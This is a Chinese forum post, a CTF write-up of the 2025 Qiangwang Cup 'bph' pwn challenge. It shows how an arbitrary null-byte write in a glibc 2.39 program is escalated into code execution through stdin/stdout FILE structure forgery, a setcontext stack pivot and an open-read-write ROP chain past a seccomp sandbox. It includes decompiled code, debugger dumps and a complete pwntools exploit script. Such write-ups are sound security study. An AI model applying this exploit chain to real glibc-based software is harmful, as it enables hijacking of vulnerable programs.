吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 620|回复: 3
上一主题 下一主题
收起左侧

[CTF] 2025 强网杯S9 pwn - bph 复盘详解:一个任意地址写00到RCE的新技巧

[复制链接]
跳转到指定楼层
楼主
kn0sky 发表于 2025-12-11 00:45 回帖奖励

文章首发自 先知社区:https://xz.aliyun.com/news/19258

前言

pwn的技巧都跟魔法一样,一瞬间,发生了很多事情,如果不了解原理,那真的很难理解了,这里和大家分享一下 强网杯S9 pwn-bph题目的魔法般的技巧(内含glibc-2.39源码&反汇编进行辅助讲解

xx一把梭搞得很多并不简单的题目分都烂了

新技巧简介:单次任意地址写00到RCE

条件:当得到任意地址写00,且程序存在利用IO_FILE获取输入的场景时,例如:fgets,fread等

流程:

  1. 可以向stdin->_IO_buf_base末位写入00,扩大输入缓冲区以至于能够覆盖stdin的输入缓冲区指针

  2. 控制输入缓冲区指针指向stdout(利用下次输出时候的虚指针调用),或者stderr(利用exit流程的虚指针调用)

  3. 再次输入可以覆盖目标IO_FILE结构,为后续利用做准备

  4. 利用 puts:_IO_sputn(vtable+0x38)的调用,配合house of emma + house of cat组合完成控制流劫持

此题目存在沙箱,所以后续还需要进行栈迁移打ROP,具体思路就是伪造IO结构控制rdx,通过setcontext+61栈迁移进行ROP,ROP ORW绕过沙箱读取flag

具体流程和分析过程看下面今年强网的题目分析吧

题目情况

glibc 2.39 版本(目前最新的大版本),程序保护全开:


    Arch:       amd64-64-little

    RELRO:      Full RELRO

    Stack:      Canary found

    NX:         NX enabled

    PIE:        PIE enabled

    FORTIFY:    Enabled

    SHSTK:      Enabled

    IBT:        Enabled

存在沙箱:


bph_16458b9d1cc48d68ba00aa2836012b81 ➤ seccomp-tools dump ./chall

 line  CODE  JT   JF      K

=================================

 0000: 0x20 0x00 0x00 0x00000004  A = arch

 0001: 0x15 0x00 0x0c 0xc000003e  if (A != ARCH_X86_64) goto 0014

 0002: 0x20 0x00 0x00 0x00000000  A = sys_number

 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005

 0004: 0x15 0x00 0x09 0xffffffff  if (A != 0xffffffff) goto 0014

 0005: 0x15 0x07 0x00 0x00000000  if (A == read) goto 0013

 0006: 0x15 0x06 0x00 0x00000001  if (A == write) goto 0013

 0007: 0x15 0x05 0x00 0x00000003  if (A == close) goto 0013

 0008: 0x15 0x04 0x00 0x00000009  if (A == mmap) goto 0013

 0009: 0x15 0x03 0x00 0x0000000c  if (A == brk) goto 0013

 0010: 0x15 0x02 0x00 0x0000003c  if (A == exit) goto 0013

 0011: 0x15 0x01 0x00 0x000000e7  if (A == exit_group) goto 0013

 0012: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0014

 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW

 0014: 0x06 0x00 0x00 0x00000000  return KILL

只能使用openat,read,write这些系统调用

open函数内部调用的系统调用就是openat:(来自 glibc-2.39 源码)


int

__libc_open (const char *file, int oflag, ...)

{

  int mode = 0;

  if (__OPEN_NEEDS_MODE (oflag))

    {

      va_list arg;

      va_start (arg, oflag);

      mode = va_arg (arg, int);

      va_end (arg);

    }

  return SYSCALL_CANCEL (openat, AT_FDCWD, file, oflag, mode);

}

libc_hidden_def (__libc_open)

最终需要通过open-read-write完成flag的读取

逆向分析

main 函数:


__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

  char s[40]; // [rsp+0h] [rbp-68h] BYREF

  unsigned __int64 v5; // [rsp+28h] [rbp-40h]

  v5 = __readfsqword(0x28u);

  init(a1, a2, a3);

  set_sandbox();

  sub_1640();                                   // 可泄露地址

  while ( 2 )

  {

    while ( 1 )

    {

      puts("");

      puts("1) Create note");

      puts("2) Edit note");

      puts("3) View note");

      puts("4) Delete note");

      puts("6) Exit");

      __printf_chk(2, "Choice: ");

      if ( fgets(s, 32, stdin) )                // fgets

        break;

LABEL_9:

      puts("bad choice");

    }

    switch ( (unsigned int)__isoc23_strtol(s, 0, 10) )

    {

      case 1u:

        create();                               // 任意地址写入00

        continue;

      case 2u:

        sub_1930();                             // 未实现

        continue;

      case 3u:

        __printf_chk(2, "Index: ");

        sub_1710();                             // 未实现

        continue;

      case 4u:

        sub_1A50();                             // 不可用

        continue;

      case 6u:

        puts("bye");

        return 0;

      default:

        goto LABEL_9;

    }

  }

}

这里init函数初始化了2个全局变量:size和ptr


int init()

{

  int result; // eax

  setvbuf(stdin, 0, 2, 0);

  result = setvbuf(stdout, 0, 2, 0);

  size = 0;

  ptr = 0;

  return result;

}

sub_1640函数提供了泄露地址的机会:可以利用残留数据泄露地址


unsigned __int64 sub_1640()

{

  char buf[88]; // [rsp+0h] [rbp-68h] BYREF

  unsigned __int64 v2; // [rsp+58h] [rbp-10h]

  v2 = __readfsqword(0x28u);

  puts("=== Tiny Service ===");

  __printf_chk(2, "Please input your token: ");

  read(0, buf, 0x50u);

  __printf_chk(2, "Your token is %s.\n", buf);

  return v2 - __readfsqword(0x28u);

}

功能函数中只有create和delete实现了,其他两个没实现功能

create:读取size,申请内存,读取数据,写入末尾的00,设置ptr和dword_4040=1

假如输入的size过大,malloc会失败返回0,read也会失败,但是 ptr+size-1=0**依然会执行,就会对 size-1=0**进行赋值,此处存在任意地址写入00字节


int create()

{

  __int64 v0; // rax

  size_t size_1; // rbx

  void *ptr; // rax

  size_t size; // [rsp+0h] [rbp-18h] BYREF

  unsigned __int64 v5; // [rsp+8h] [rbp-10h]

  v5 = __readfsqword(0x28u);

  if ( ptr || dword_4040 )

  {

    LODWORD(v0) = puts("No free slots.");

  }

  else

  {

    __printf_chk(2, "Size: ");

    __isoc23_scanf("%zu", &size);               // 读取size

    getc(stdin);

    size_1 = size;

    ptr = malloc(size);                         // 申请内存

    ::size = size_1;

    ptr = ptr;

    __printf_chk(2, "Content: ");

    read(0, ptr, size);                         // 读取数据

    *((char *)ptr + size - 1) = 0;              // 写入00

    __printf_chk(2, "Created note %d\n", 0);

    dword_4040 = 1;

    return v5 - __readfsqword(0x28u);

  }

  return v0;

}

delete:检查dword_4040和ptr,如果存在ptr且dword_4040=0,才能执行free,这个条件不可能存在,所以可以认为这个函数不存在,不用再看了


int sub_1A50()

{

  char s[40]; // [rsp+0h] [rbp-38h] BYREF

  unsigned __int64 v2; // [rsp+28h] [rbp-10h]

  v2 = __readfsqword(0x28u);

  __printf_chk(2, "Index: ");

  if ( !fgets(s, 32, stdin) || dword_4040 | (unsigned int)__isoc23_strtol(s, 0, 10) )

    return puts("invalid");

  if ( !ptr )

    return puts("already empty");

  free(ptr);

  ptr = 0;

  size = 0;

  return puts("Deleted (pointer left dangling).");

}

利用分析

程序逻辑很简单,就一次任意大小分配+末尾写入00字节的功能

分析一下现状:

  • glibc-2.39 版本,保护全开

  • 存在地址泄露,可以泄露libc地址

  • 存在任意地址写入00字节

  • 通过fgets读取输入

思路:精准满足3个条件,这里可以用从任意地址写入 00 到 RCE的技巧:

  1. 向stdin的IO_FILE结构体中_IO_buf_base末位写入00,就可以在下一次输入的时候,将输入的数据读取到输入缓冲区base到end的位置上,通过向末位写入00,可以让base指针指向更提前的地方,以至于下一次写入能够完整覆盖_IO_buf_base和_IO_buf_end

  2. 下一次写入修改stdin的_IO_buf_base和_IO_buf_end为能够覆盖 stdout 结构体的范围,再下一次读取数据便可以完整覆盖stdout

  3. 利用程序中会调用puts函数,puts函数会调用 _IO_sputn函数指针,通过house of emma偏移vtable指针的思想,即可通过调整偏移伪造FILE结构完成利用

  4. 对于沙箱,则通过setcontext来绕过即可

泄露libc地址过程:

利用残留数据泄露libc地址:


payload = cyclic(0x28)

sa(b"token: ",payload)

ru(cyclic(0x28))

leak = r(6).ljust(8,b"\x00")

leak = unpack(leak) - 126

success(f"leak: {hex(leak)}")

libc.address = leak - libc.sym.free

success(f"libc base: {hex(libc.address)}")

覆盖 stdin->_IO_buf_base 末位地址

通过构造size = stdin->_IO_buf_base + 1,进入create函数,触发任意地址写00


target = libc.address +0x203918

success(f"target: {hex(target)}")

sla(b"Choice: ",b"1")

sla(b"Size: ",str(target+1).encode())

sa(b": ",b"aaaa")

写入00后的stdin:这里+0x38处就是_IO_buf_base,+0x40处就是_IO_buf_end,可以看到,范围从0x7ffff7f90964(原本缓冲区就1字节)变到0x7ffff7f90900~0x7ffff7f90964,范围刚好覆盖到这个_IO_buf_base和_IO_buf_end


pwndbg> x/40xga &_IO_2_1_stdin_

0x7ffff7f908e0 <_IO_2_1_stdin_>:        0xfbad20ab      0x7ffff7f90900 <_IO_2_1_stdin_+32>

0x7ffff7f908f0 <_IO_2_1_stdin_+16>:     0x7ffff7f90900 <_IO_2_1_stdin_+32>      0x7ffff7f90900 <_IO_2_1_stdin_+32>

0x7ffff7f90900 <_IO_2_1_stdin_+32>:     0x7ffff7f90900 <_IO_2_1_stdin_+32>      0x7ffff7f90900 <_IO_2_1_stdin_+32>

0x7ffff7f90910 <_IO_2_1_stdin_+48>:     0x7ffff7f90900 <_IO_2_1_stdin_+32>      0x7ffff7f90900 <_IO_2_1_stdin_+32>

0x7ffff7f90920 <_IO_2_1_stdin_+64>:     0x7ffff7f90964 <_IO_2_1_stdin_+132>     0x0

0x7ffff7f90930 <_IO_2_1_stdin_+80>:     0x0     0x0

0x7ffff7f90940 <_IO_2_1_stdin_+96>:     0x0     0x0

0x7ffff7f90950 <_IO_2_1_stdin_+112>:    0x0     0xffffffffffffffff

0x7ffff7f90960 <_IO_2_1_stdin_+128>:    0xa000000       0x7ffff7f92720 <_IO_stdfile_0_lock>

0x7ffff7f90970 <_IO_2_1_stdin_+144>:    0xffffffffffffffff      0x0

0x7ffff7f90980 <_IO_2_1_stdin_+160>:    0x7ffff7f909c0 <_IO_wide_data_0>        0x0

0x7ffff7f90990 <_IO_2_1_stdin_+176>:    0x0     0x0

0x7ffff7f909a0 <_IO_2_1_stdin_+192>:    0xffffffff      0x0

0x7ffff7f909b0 <_IO_2_1_stdin_+208>:    0x0     0x7ffff7f8f030 <_IO_file_jumps>

复写 stdin->_IO_buf_base和_IO_buf_end指向stdout

下一次输入的时候,输入缓冲区会从0x7ffff7f90900开始,需要伪造0x7ffff7f90900开始的数据:


payload = pack(0)*3 + pack(libc.sym._IO_2_1_stdout_) + pack(libc.sym._IO_2_1_stdout_ + 0x200)

s(payload)

这里只用管_IO_buf_base和_IO_buf_end的值,前面的值会自动更新的,让他刚好覆盖到stdout结构体即可,覆盖完之后:


pwndbg> x/40xga &_IO_2_1_stdin_

0x7ffff7f908e0 <_IO_2_1_stdin_>:        0xfbad208b      0x7ffff7f915c0 <_IO_2_1_stdout_>

0x7ffff7f908f0 <_IO_2_1_stdin_+16>:     0x7ffff7f915c0 <_IO_2_1_stdout_>        0x7ffff7f915c0 <_IO_2_1_stdout_>

0x7ffff7f90900 <_IO_2_1_stdin_+32>:     0x7ffff7f915c0 <_IO_2_1_stdout_>        0x7ffff7f915c0 <_IO_2_1_stdout_>

0x7ffff7f90910 <_IO_2_1_stdin_+48>:     0x7ffff7f915c0 <_IO_2_1_stdout_>        0x7ffff7f915c0 <_IO_2_1_stdout_>

0x7ffff7f90920 <_IO_2_1_stdin_+64>:     0x7ffff7f917c0 <_nl_locale_file_list+96>        0x0

0x7ffff7f90930 <_IO_2_1_stdin_+80>:     0x0     0x0

0x7ffff7f90940 <_IO_2_1_stdin_+96>:     0x0     0x0

0x7ffff7f90950 <_IO_2_1_stdin_+112>:    0x0     0xffffffffffffffff

0x7ffff7f90960 <_IO_2_1_stdin_+128>:    0xa000000       0x7ffff7f92720 <_IO_stdfile_0_lock>

0x7ffff7f90970 <_IO_2_1_stdin_+144>:    0xffffffffffffffff      0x0

0x7ffff7f90980 <_IO_2_1_stdin_+160>:    0x7ffff7f909c0 <_IO_wide_data_0>        0x0

0x7ffff7f90990 <_IO_2_1_stdin_+176>:    0x0     0x0

0x7ffff7f909a0 <_IO_2_1_stdin_+192>:    0xffffffff      0x0

0x7ffff7f909b0 <_IO_2_1_stdin_+208>:    0x0     0x7ffff7f8f030 <_IO_file_jumps>

house of emma + house of cat + puts 劫持控制流

下一次输入的时候,输入缓冲区就会覆盖到stdout结构体,现在可以伪造stdout结构了,利用puts的 _IO_sputn调用进行利用


   0x00007ffff7e1a2a8 <+40>:    mov    rax,QWORD PTR [rdi+0xa0]

   0x00007ffff7e1a2af <+47>:    test   ecx,ecx

   0x00007ffff7e1a2b1 <+49>:    je     0x7ffff7e1a6b0 <__GI__IO_wfile_seekoff+1072>

   0x00007ffff7e1a2b7 <+55>:    mov    r12d,edx

   0x00007ffff7e1a2ba <+58>:    mov    rcx,QWORD PTR [rax+0x18]

   0x00007ffff7e1a2be <+62>:    mov    rdx,QWORD PTR [rax+0x20]

   0x00007ffff7e1a2c2 <+66>:    mov    rbx,rsi

   0x00007ffff7e1a2c5 <+69>:    mov    rdi,QWORD PTR [rax+0x8]

   0x00007ffff7e1a2c9 <+73>:    xor    r15d,r15d

   0x00007ffff7e1a2cc <+76>:    cmp    QWORD PTR [rax+0x10],rdi

   0x00007ffff7e1a2d0 <+80>:    je     0x7ffff7e1a6a0 <__GI__IO_wfile_seekoff+1056>

   0x00007ffff7e1a2d6 <+86>:    cmp    rcx,rdx

   0x00007ffff7e1a2d9 <+89>:    jb     0x7ffff7e1a2e5 <__GI__IO_wfile_seekoff+101>

   0x00007ffff7e1a2db <+91>:    test   DWORD PTR [r13+0x0],0x800

   0x00007ffff7e1a2e3 <+99>:    je     0x7ffff7e1a2fc <__GI__IO_wfile_seekoff+124>

   0x00007ffff7e1a2e5 <+101>:   mov    rdi,r13

   0x00007ffff7e1a2e8 <+104>:   call   0x7ffff7e17fb0 <__GI__IO_switch_to_wget_mode>

摘出来:

r13是stdout指针


   0x00007ffff7e1a2a8 <+40>:    mov    rax,QWORD PTR [rdi+0xa0]

...

   0x00007ffff7e1a2ba <+58>:    mov    rcx,QWORD PTR [rax+0x18]

   0x00007ffff7e1a2be <+62>:    mov    rdx,QWORD PTR [rax+0x20]

...

   0x00007ffff7e1a2c5 <+69>:    mov    rdi,QWORD PTR [rax+0x8]

需要第一个跳转不成立,第二个成立


   0x00007ffff7e1a2cc <+76>:    cmp    QWORD PTR [rax+0x10],rdi

   0x00007ffff7e1a2d0 <+80>:    je     0x7ffff7e1a6a0 <__GI__IO_wfile_seekoff+1056> ;[rax+0x10] == rdi 跳转

   0x00007ffff7e1a2d6 <+86>:    cmp    rcx,rdx

   0x00007ffff7e1a2d9 <+89>:    jb     0x7ffff7e1a2e5 <__GI__IO_wfile_seekoff+101>  ;rcx-rdx >0 跳转

最小化payload,可以让+0xa0和当前IO_FILE结构重叠,指向stdout本身

需要

  1. +0x8 和 +0x10不同,这个不用管,+0x10会自动赋值,必然和+0x8的不一样

  2. +0x18 < +0x20

rdx 可控, 接下来的赋值:需要用到+0x20的值,+0x20也设置为fp

此时的+0x18需要满足上面的条件且为一个libc中代码段地址(gadget):

此时内存布局,stdout的位置如下,可见gadget地址一定小于fp地址


    0x7ffff7d8d000     0x7ffff7db5000 r--p    28000      0 libc.so.6

    0x7ffff7db5000     0x7ffff7f3d000 r-xp   188000  28000 libc.so.6

    0x7ffff7f3d000     0x7ffff7f8c000 r--p    4f000 1b0000 libc.so.6

    0x7ffff7f8c000     0x7ffff7f90000 r--p     4000 1fe000 libc.so.6

►   0x7ffff7f90000     0x7ffff7f92000 rw-p     2000 202000 libc.so.6

    0x7ffff7f92000     0x7ffff7f9f000 rw-p     d000      0 [anon_7ffff7f92]

接下来的流程:


   0x00007ffff7e17fc0 <+16>:    mov    rax,QWORD PTR [rdi+0xa0]

   0x00007ffff7e17fc7 <+23>:    mov    rdx,QWORD PTR [rax+0x20]

   0x00007ffff7e17fcb <+27>:    cmp    QWORD PTR [rax+0x18],rdx

   0x00007ffff7e17fcf <+31>:    jae    0x7ffff7e17ff0 <__GI__IO_switch_to_wget_mode+64>

   0x00007ffff7e17fd1 <+33>:    mov    rax,QWORD PTR [rax+0xe0]

   0x00007ffff7e17fd8 <+40>:    mov    esi,0xffffffff

   0x00007ffff7e17fdd <+45>:    call   QWORD PTR [rax+0x18]

需要[rax+18] < [rax+0x20] 来规避跳转,这个问题刚刚已经解决了

[rax + 0xe0] 也重叠 fp,最后call到 +0x18处

payload:


io_payload = flat({

    0x18:pack(0xdeadbeef),                      # read_base   

    0x20:pack(fp),                              # write_base     _wide_data.write_base

    0x88:pack(fp+8) ,                           # lock

    0xa0:pack(fp),                              # _wide_data

    0xc0:pack(0),                               # mode

    0xd8:pack(libc.sym._IO_wfile_jumps+0x10),   # vtable

    0xe0:pack(fp),                      

},filler=b"\x00")

对于寄存器的控制:rdx = [fp+0x20]

2次进入 setcontext 完成栈迁移,准备 rop

setcontext+61:需要可控rdx就能控制寄存器的值,因为需要rop,所以需要控制rsp的值,然后最后通过ret进入rop链中,此时已经不再需要IO结构体了,可以损坏IO结构,在这片内存上任意挥霍,最简单的思路就是跳转到read上,写入数据到rsp里开始rop

+0xa0已经设置为fp了,会被赋值给rsp


   0x00007ffff7dd799d <+61>:    mov    rsp,QWORD PTR [rdx+0xa0]

   0x00007ffff7dd79a4 <+68>:    mov    rbx,QWORD PTR [rdx+0x80]

   0x00007ffff7dd79ab <+75>:    mov    rbp,QWORD PTR [rdx+0x78]

   0x00007ffff7dd79af <+79>:    mov    r12,QWORD PTR [rdx+0x48]

   0x00007ffff7dd79b3 <+83>:    mov    r13,QWORD PTR [rdx+0x50]

   0x00007ffff7dd79b7 <+87>:    mov    r14,QWORD PTR [rdx+0x58]

   0x00007ffff7dd79bb <+91>:    mov    r15,QWORD PTR [rdx+0x60]

   0x00007ffff7dd79bf <+95>:    test   DWORD PTR fs:0x48,0x2

   0x00007ffff7dd79cb <+107>:   je     0x7ffff7dd7a86 <setcontext+294>

...

   0x00007ffff7dd7a86 <+294>:   mov    rcx,QWORD PTR [rdx+0xa8]

   0x00007ffff7dd7a8d <+301>:   push   rcx

   0x00007ffff7dd7a8e <+302>:   mov    rsi,QWORD PTR [rdx+0x70]

   0x00007ffff7dd7a92 <+306>:   mov    rdi,QWORD PTR [rdx+0x68]

   0x00007ffff7dd7a96 <+310>:   mov    rcx,QWORD PTR [rdx+0x98]

   0x00007ffff7dd7a9d <+317>:   mov    r8,QWORD PTR [rdx+0x28]

   0x00007ffff7dd7aa1 <+321>:   mov    r9,QWORD PTR [rdx+0x30]

   0x00007ffff7dd7aa5 <+325>:   mov    rdx,QWORD PTR [rdx+0x88]

   0x00007ffff7dd7aac <+332>:   xor    eax,eax

   0x00007ffff7dd7aae <+334>:   ret

这里最后经过push操作,在ret的之后,rsp指向 _IO_2_1_stderr_+216,也就是push的值:[rdx+0xa8],这里是ret跳转的地址

直接跳转到read,控制rdi=0,rsi=fp,rdx=size,rdx=[fp+0x88],数字过大,read调用会失败,需要再次进入setcontext重新设置三个寄存器的值即可,原本fp+0x88指向fp+8,只需要将需要赋值的偏移+8,最终的结构体:


io_payload = flat({

    0x18:pack(libc.sym.setcontext + 61),           # read_base   

    0x20:pack(fp),           # write_base     _wide_data.write_base

    0x68 + 8:pack(0),       # rdi

    0x70 + 8:pack(fp),      # rsi

    0x88:pack(fp+8) ,        # lock

    0x88 + 8:pack(0x400),   # rcx

    0xa0:pack(fp),           # _wide_data

    0xa8:pack(libc.sym.setcontext + 294),        # setcontext+61 -> ret address

    0xa8+8:pack(libc.sym.read),           # setcontext+294 -> ret address

    0xc0:pack(0),                               # mode

    0xd8:pack(libc.sym._IO_wfile_jumps+0x10),   # vtable

    0xe0:pack(fp),                              # _wide_vtable

},filler=b"\x00")

ROP 完成 ORW

完成ORW需要设置3个参数,这里的libc-2.39直接用ropper或者ROPGadget无法搜到pop rdx的片段,但是这不重要,第三个参数只要是个数字就行,是多少无所谓,直接搜mov dl的片段:


0x00000000001a1fab : mov dl, 0x65 ; ret

0x00000000001a22b1 : mov dl, 0x66 ; ret

利用这个完成第三个参数的赋值即可,dl是rdx的低8位,rop的时候rdx=0,可以这么用

最终rop chain:


mov_dl_0x65_ret = libc.address + 0x00000000001a1fab

buf = fp + 0x150

rop = ROP(libc,fp)

rop.open("/flag",0)

rop.raw(mov_dl_0x65_ret)

rop.read(3,buf)

rop.raw(mov_dl_0x65_ret)

rop.write(1,buf)

s(rop.chain())

完整exp


#!/usr/bin/env python3

from pwn import *

context.arch="amd64"

io = process("./chall")

#io = remote("",)

libc = ELF("libc.so.6")

r   = lambda x    : io.recv(numb=x)

ru  = lambda x    : io.recvuntil(x)

rl  = lambda      : io.recvline()

s  = lambda x    : io.send(x)

sl  = lambda x    : io.sendline(x)

ia  = lambda      : io.interactive()

sla = lambda a, b : io.sendlineafter(a, b)

sa  = lambda a, b : io.sendafter(a, b)

# leak libc address

payload = cyclic(0x28)

sa(b"token: ",payload)

ru(cyclic(0x28))

leak = r(6).ljust(8,b"\x00")

leak = unpack(leak) - 126

success(f"leak: {hex(leak)}")

libc.address = leak - libc.sym.free

success(f"libc base: {hex(libc.address)}")

# forge stdin input buffer 

target = libc.address +0x203918

success(f"target: {hex(target)}")

sla(b"Choice: ",b"1")

sla(b"Size: ",str(target+1).encode())

sa(b": ",b"aaaa")

payload = pack(0)*3 + pack(libc.sym._IO_2_1_stdout_) + pack(libc.sym._IO_2_1_stdout_ + 0x200)

s(payload)

# fake io file structure

fp = libc.sym._IO_2_1_stdout_

io_payload = flat({

    0x18:pack(libc.sym.setcontext + 61),           # read_base   

    0x20:pack(fp),           # write_base     _wide_data.write_base

    0x68 + 8:pack(0),       # rdi

    0x70 + 8:pack(fp),      # rsi

    0x88:pack(fp+8) ,        # lock

    0x88 + 8:pack(0x400),   # rcx

    0xa0:pack(fp),           # _wide_data

    0xa8:pack(libc.sym.setcontext + 294),        # setcontext+61 -> ret address

    0xa8+8:pack(libc.sym.read),           # setcontext+294 -> ret address

    0xc0:pack(0),                               # mode

    0xd8:pack(libc.sym._IO_wfile_jumps+0x10),   # vtable

    0xe0:pack(fp),                              # _wide_vtable

},filler=b"\x00")

s(io_payload)

# sandbox bypass

#0x00000000001a1fab : mov dl, 0x65 ; ret

mov_dl_0x65_ret = libc.address + 0x00000000001a1fab

buf = fp + 0x150

rop = ROP(libc,fp)

rop.open("/flag",0)

rop.raw(mov_dl_0x65_ret)

rop.read(3,buf)

rop.raw(mov_dl_0x65_ret)

rop.write(1,buf)

s(rop.chain())

ia()

总结

  • 一个新的技巧1:任意地址写00到rce,利用IO读取(fgets)会使用IO_FILE读取缓冲区的特点,完成IO_FILE结构伪造,通过puts触发虚函数调用劫持执行流

  • 一个新的技巧2:orw rop的时候,对于没有pop rdx的场景,找mov dl, 0x??也好使

参考资料

免费评分

参与人数 2吾爱币 +1 热心值 +2 收起 理由
AG6 + 1 我很赞同!
Oxegjxeg + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
炫迈 发表于 2025-12-11 14:53
stdin缓冲区覆盖这个野路子,比传统house of系列更隐蔽,glibc 2.39环境下堪称核弹级技巧。但全文硬塞setcontext+61栈迁移那段纯属炫技,沙箱绕过明明可以用更直白的sigreturn,非要绕两圈进ROP,实战中早被ASLR教做人了

免费评分

参与人数 1吾爱币 +3 热心值 +1 收起 理由
kn0sky + 3 + 1 谢谢@Thanks!

查看全部评分

3#
DeemoML 发表于 2025-12-11 17:21
4#
czyy003 发表于 2025-12-11 22:59
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-12-12 06:01

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表